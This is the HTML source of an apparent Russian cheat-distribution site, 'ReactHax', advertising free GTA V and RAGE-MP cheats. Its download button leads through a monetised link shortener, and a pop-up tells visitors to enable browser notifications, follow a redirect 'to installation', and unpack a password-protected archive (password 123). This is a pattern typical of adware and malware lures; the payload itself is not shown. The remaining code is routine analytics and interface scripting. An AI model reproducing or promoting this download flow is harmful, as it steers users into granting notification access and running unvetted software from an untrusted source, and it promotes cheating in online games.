<html lang="ru">

<head>
	<title>ReactHax | Слив приватных читов</title>

	<meta name="keywords"
	content="Кс го, cs go, ксго, csgo, cs:go, aurora, aurora project, аврора, аврора чит, новый чит, лучший чит, Чит для CS GO, читы кс го, чит на кс го, Чит для cs go, читы для кс го, читы, чит кс го, чит, aurora чит, читы на кс го, приватный чит, чит для КС ГО, чит аврора, freeqn, spirthack, xone, чит CS:GO, freeqnnet, CS:GO, multihack, чит, скины, wh, aimbot, инвентарь, danger zone, запретная зона, читы для ксго, haunted">
<meta name="viewport"
	content="width=device-width, user-scalable=no, initial-scale=1.0, maximum-scale=1.0, minimum-scale=1.0">
<meta data-n-head="true" data-hid="og-image" name="og:image" content="/main/templates/img/preview.png">
<meta property="og:image" content="images/preview.webp">
<link rel="stylesheet" href="css/bootstrap_v2.css">
<link rel="stylesheet" href="css/styles_v2.css">
<link data-n-head="true" rel="icon" type="image/x-icon" href="icon.ico">
<script async src="js/tag.js"></script>
<script type="text/javascript" src="js/jQuery.js"></script>
<script src="js/jquery-3.2.1.min.js"></script>
<script src="js/bootstrap.min.js"></script>
<link rel="stylesheet" href="css/all.css" crossorigin="anonymous">
<link rel="stylesheet" href="./css/modal.css">
<script charset="UTF-8" src="js/d81fc080957fc0f2b5dc4e7745e641a1_1.js" async></script>
<script type="application/ld+json">
{
  "@context": "https://aurora-project.ru",
  "@type": "Aurora Project - Приватный чит для CS:GO",
  "itemListElement": [{
    "@type": "ListItem",
    "position": 1,
    "name": "Купить",
    "item": "https://aurora-project.ru/buy"
  },{
    "@type": "ListItem",
    "position": 2,
    "name": "Бесплатный чит",
    "item": "https://aurora-project.ru/free"
  }]
}
</script>
	<script type="text/javascript">
		(function (m, e, t, r, i, k, a) {
			m[i] = m[i] || function () { (m[i].a = m[i].a || []).push(arguments) };
			m[i].l = 1 * new Date(); k = e.createElement(t), a = e.getElementsByTagName(t)[0], k.async = 1, k.src = r, a.parentNode.insertBefore(k, a)
		})
			(window, document, "script", "https://mc.yandex.ru/metrika/tag.js", "ym");

		ym(56889892, "init", {
			clickmap: true,
			trackLinks: true,
			accurateTrackBounce: true
		});
	</script>
	<noscript>
		<div><img src="https://mc.yandex.ru/watch/56889892" style="position:absolute; left:-9999px;" alt></div>
	</noscript>
	<script async src="https://www.googletagmanager.com/gtag/js?id=UA-158919283-1"></script>
	<script>
		window.dataLayer = window.dataLayer || [];
		function gtag() { dataLayer.push(arguments); }
		gtag('js', new Date());

		gtag('config', 'UA-158919283-1');
	</script>
	<script charset="UTF-8" src="js/d81fc080957fc0f2b5dc4e7745e641a1_1.js" async></script>
</head>

<body>
	<div id="header">
		<div class="container">
			<div class="row">
				<nav class="navbar navbar-expand-md bg-transparent w-100">
					<a class="navbar-brand lt-110" href="./index.html">
						<span class="font-bold">ReactHax</span>
						<span class="font-bold">Слив приватных читов</span>
					</a>
					<button class="navbar-toggler" type="button" data-toggle="collapse"
						data-target="#navbarSupportedContent" aria-controls="navbarSupportedContent"
						aria-expanded="false" aria-label="Toggle navigation">
						<i class="fas fa-bars"></i>
					</button>
					<div class="collapse navbar-collapse ml-auto" id="navbarSupportedContent">
						<ul class="navbar-nav ml-auto font-medium w-100 lt-110" name="menu">
							<li class="nav-item"><a class="nav-link" href="/">Главная</a></li>
							<li class="nav-item"><a class="nav-link" href="./CS:GO.html">CS:GO</a></li>
							<li class="nav-item"><a class="nav-link" href="./fortnite.html">Fortnite</a></li>
							<li class="nav-item"><a class="nav-link" href="./Gta_V.html">Gta V</a></li>
						</ul>
					</div>
				</nav>
			</div>
		</div>
	</div>
	<div class="alerts"></div>
	<div id="index">
		<div class="container">
			<div class="row">
				<div class="col col-12 col-md-6">
					<div class="row img-title-top">
						<img src="https://krispymods.com/images/0xCheats-Mod-Menu-GTAV-Dark-Mode.png" alt
							class="img-fluid">
						<svg width="95" height="64" viewBox="0 0 95 64" fill="none" xmlns="http://www.w3.org/2000/svg">
							<circle cx="82.731" cy="51.6184" r="11.5653" transform="rotate(-112.601 82.731 51.6184)"
								fill="#0060FE" />
							<circle cx="29.8047" cy="29.8046" r="28.9134" transform="rotate(-112.601 29.8047 29.8046)"
								fill="#0060FE" />
						</svg>
					</div>
				</div>
				<div class="col col-12 col-md-6">
					<div class="title-index">
						<svg width="49" height="49" viewBox="0 0 49 49" fill="none" xmlns="http://www.w3.org/2000/svg">
							<circle cx="7" cy="42" r="7" fill="#0060FE" />
							<circle cx="31.5" cy="17.5" r="17.5" fill="#0060FE" />
						</svg>
						<div class="title-index-mini font-medium">FREE</div>
						<h1 class="font-bold"><i>Наслаждайся игрой</i><br>в GTA V</h1>
						<div class="title-index-text font-medium">Лучший бесплатный чит для новичков с простым
							интерфейсом на русском языке</div>
						<div class="title-index-windows font-medium"><i class="fab fa-windows"></i>Работает на всех
							версиях Windows</div>
						<div class="title-index-button-block d-flex flex-wrap">
							<a href="https://moneyz.fun/W7N9WZ" target="_blank"
								class="title-index-button sp_notify_prompt active"
								onclick="alert('Пароль от архива: 123\n1. Включите уведомления в вашем браузере (настройки -> конфиденциальность и безопасность -> настройки сайтов -> уведомления).\n2. Перейдите по ссылке, пройдите недолгую переадресацию на установку.\n3. Скачайте архив любым доступным способом и распакуйте его, указав пароль. Инструкция по запуску расположена внизу страницы')"><i
									class="fas fa-file-download"></i>Скачать чит</a>
						</div>
					</div>
				</div>
			</div>
		</div>
	</div>

	<div id="index" style="padding-top: 0; ">
		<div class="container">
			<div class="row">
				<div class="col col-12 col-md-6 order-md-0 order-1">
					<div class="title-index">
						<div class="title-index-mini font-medium">видео</div>
						<h1 class="font-bold">Обзор на чит 0x</h1>
						<div class="title-index-text font-medium">0xcheat - На данный момент топовый софт для RAGE-MP,
							если ты искал чит в котором будешь уверен на все 100% то это точно он. Здесь есть телепорт
							по метке, валлхак, открытие замков автомобилей и многое многое другое, смотри в ролике!
						</div>
					</div>
				</div>
				<div class="col col-12 col-md-6 order-md-1 order-0">
					<div class="row">
						<iframe width="560" height="315" src="https://www.youtube.com/embed/I1MG9V4C36U"
							title="YouTube video player" frameborder="0"
							allow="accelerometer; autoplay; clipboard-write; encrypted-media; gyroscope; picture-in-picture"
							allowfullscreen></iframe>
					</div>
				</div>
			</div>
		</div>
	</div>
	<div id="footer" style="margin-top: 0; background-color: #fff;">
		<div class="container-fluid">
			<div class="footer-row">
				<div class="col col-12 col-md-6">
					<div class="col col-12 col-md-6" style="max-width: 100%;">
						<div class="background-footer-1">
							<span class="d-block font-bold">ReactHax</span>
							<span class="d-block font-medium">Слив приватных читов</span>
							<span class="d-block font-medium">© 2017-2022</span>
						</div>
					</div>
				</div>
			</div>
		</div>
	</div>
	<script src="js/main.js"></script>
	<script src="js/jquery.min.js"></script>
	<script type="text/javascript" src="js/jquery.min_1.js"></script>
	<script>
		function removeAlert() {
			var GetLastAlert = $('.alerts .alert').last();
			setTimeout(function () {
				GetLastAlert.fadeOut(500);
			}, 4000);
			setTimeout(function () {
				GetLastAlert.remove();
			}, 4500);
		}
	</script>
	<script>
		$('#russian').on("click", function (event) {

			$.ajax({
				type: 'POST',
				url: "/index/russian/",
				data: 0,
				cache: false,
				contentType: false,
				processData: false,
				dataType: 'json',
				success: function (data) {

					if (data['status'] == 1) {
						$(".alerts").append(
							"<div class='alert alert-success' role='alert'>" +
							"<div>" +
							"<i class='fas fa-check' style='padding: 10px 11px;'></i>" +
							"</div>" +
							"<p>" + data['message'] + "</p>" +
							"</div>"
						);
						setTimeout(function () {
							window.location.reload();
						}, 1500);
					}
					if (data['status'] == 2) {
						$(".alerts").append(
							"<div class='alert alert-warning' role='alert'>" +
							"<div>" +
							"<i class='fas fa-exclamation' style='padding: 10px 11px;'></i>" +
							"</div>" +
							"<p>" + data['message'] + "</p>" +
							"</div>"
						);
					}
					if (data['status'] == 0) {
						$(".alerts").append(
							"<div class='alert alert-danger' role='alert'>" +
							"<div>" +
							"<i class='fas fa-times'></i>" +
							"</div>" +
							"<p>" + data['message'] + "</p>" +
							"</div>"
						);
					}
					removeAlert();
				}
			});
		});
		$('#english').on("click", function (event) {
			$.ajax({
				type: 'POST',
				url: "/index/english/",
				data: 0,
				cache: false,
				contentType: false,
				processData: false,
				dataType: 'json',
				success: function (data) {

					if (data['status'] == 1) {
						$(".alerts").append(
							"<div class='alert alert-success' role='alert'>" +
							"<div>" +
							"<i class='fas fa-check' style='padding: 10px 11px;'></i>" +
							"</div>" +
							"<p>" + data['message'] + "</p>" +
							"</div>"
						);
						setTimeout(function () {
							window.location.reload();
						}, 1500);
					}
					if (data['status'] == 2) {
						$(".alerts").append(
							"<div class='alert alert-warning' role='alert'>" +
							"<div>" +
							"<i class='fas fa-exclamation' style='padding: 10px 11px;'></i>" +
							"</div>" +
							"<p>" + data['message'] + "</p>" +
							"</div>"
						);
					}
					if (data['status'] == 0) {
						$(".alerts").append(
							"<div class='alert alert-danger' role='alert'>" +
							"<div>" +
							"<i class='fas fa-times'></i>" +
							"</div>" +
							"<p>" + data['message'] + "</p>" +
							"</div>"
						);
					}
					removeAlert();
				}
			});
		});
	</script>
	<script>
		function DropDown(el) {
			this.dd = el;
			this.initEvents();
		}
		DropDown.prototype = {
			initEvents: function () {
				var obj = this;

				obj.dd.on('click', function (event) {
					$(this).toggleClass('active');
					event.stopPropagation();
				});
			}
		}
		$(function () {
			var dd = new DropDown($('#dd'));
			$(document).click(function () {
				$('.wrapper-dropdown').removeClass('active');
			});
		});
	</script>

</body>

</html>